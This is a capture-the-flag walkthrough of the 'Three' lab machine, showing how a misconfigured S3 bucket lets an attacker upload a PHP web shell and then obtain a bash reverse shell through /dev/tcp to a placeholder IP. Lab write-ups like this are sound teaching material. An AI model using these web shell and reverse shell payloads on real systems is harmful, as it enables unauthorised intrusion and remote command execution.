Prepared by: Joel_kh
Introduction Organizations of every type, size, and industry are using the cloud for a wide variety of use cases, such as data backup, storage, disaster recovery, email, virtual desktops, software development and testing, etc. Thus, it is crucial to have a secure configuration for a company’s cloud infrastructure in order to protect against any attacks. Three is a Linux box that includes a website, which utilizes an AWS S3 bucket as its cloud-storage device. We can exploit this poorly configured S3 bucket and upload a reverse shell on it. We can then visit the corresponding URL to execute the reverse file and ultimately retrieve the flag.
Enumeration
To start with, we will check for open ports using a Nmap scan: The scan shows that two ports are open — port 80 (HTTP) and port 22 (SSH). Let’s enumerate port 80 using our web browser.
sudo nmap -sV 10.129.227.248
We can see a static webpage that features a concert ticket booking section but it isn’t functional. Let’s further try to identify the technology stack of the website using a browser extension known as Wappalyzer. It can be installed on the supported browsers. Once the Wappalyzer extension is installed, we can visit the website and then click on the extension icon to reveal the results.
Wappalyzer identifies PHP as the programming language being used by the website. Upon scrolling down the webpage, we come across the “Contact” section, which has email information. The email given here has the domain thetoppers.htb .
Let’s add an entry for thetoppers.htb in the /etc/hosts file with the corresponding IP address to be able to access this domain in our browser. The /etc/hosts file is used to resolve a hostname into an IP address. By default, the /etc/hosts file is queried before the DNS server for hostname resolution thus we will need to add an entry in the /etc/hosts file for this domain to enable the browser to resolve the address for thetoppers.htb .
echo “10.129.227.248 thetoppers.htb” | sudo tee -a /etc/hosts
Sub-domain enumeration
As we have the domain thetoppers.htb , let us enumerate for any other sub-domains that may be present on the same server. There are different enumeration tools available for this purpose like gobuster , wfuzz , feroxbuster etc.
As of this writeup, we will be using gobuster for sub-domain enumeration using the following command. We will be using the following flags for gobuster .
Note: If using Gobuster version 3.2.0 and above we also have to add the — append-domain flag to our command so that the enumeration takes into account the known vHost ( thetoppers.htb ) and appends it to the words found in the wordlist ( word.thetoppers.htb ).
GoBuster will send out requests with a host header that looks like the following for each word in the wordlist: It will note the default response, and show any that return something different.
gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
vhost : Uses VHOST for brute-forcing
- w : Path to the wordlist
- -u : Specify the URL Host: [word].thetoppers.htb
echo “10.129.227.248 s3.thetoppers.htb” | sudo tee -a /etc/hosts
After we have added an entry for the domain to our hosts file let’s visit s3.thetoppers.htb using a browser.
S3 bucket
A quick Google search containing the keywords “s3 subdomain status running” returns this result stating that S3 is a cloud-based object storage service. It allows us to store things in containers called buckets. AWS S3 buckets have various use-cases including Backup and Storage, Media Hosting, Software Delivery, Static Website etc. The files stored in the Amazon S3 bucket are called S3 objects
We can interact with this S3 bucket with the aid of the awscli utility. It can be installed on Linux using the command apt install awscli . First, we need to configure it using the following command.
aws configure
We can list all of the S3 buckets hosted by the server by using the ls command.
aws --endpoint=http://s3.thetoppers.htb s3 ls
awscli has got another feature that allows us to copy files to a remote bucket. We already know that the website is using PHP. Thus, we can try uploading a PHP shell file to the S3 bucket and since it’s uploaded to the webroot directory we can visit this webpage in the browser, which will, in turn, execute this file and we will achieve remote code execution. We can use the following PHP one-liner which uses the system() function which takes the URL parameter cmd as an input and executes it as a system command.
<?php system($_GET["cmd"]); ?>Let’s create a PHP file to upload.
echo '<?php system($_GET["cmd"]); ?>' > shell.phpThen, we can upload this PHP shell to the thetoppers.htb S3 bucket using the following command.
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
Let’s get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload which will connect back to our local machine on port 1337
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1We will start a ncat listener on our local port 1337 using the following command.
nc -nvlp 1337
Let’s start a web server on our local machine on port 8000 and host this bash file. It is crucial to note here that this command for hosting the web server must be run from the directory which contains the reverse shell file. So, we must first traverse to the appropriate directory and then run the following command.
python3 -m http.server 8000We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash in order to execute it. Thus, let us visit the following URL containing the payload in the browser.
The flag can be found at /var/www/flag.txt .
cat /var/www/flag.txtCongratulations, you have successfully completed Three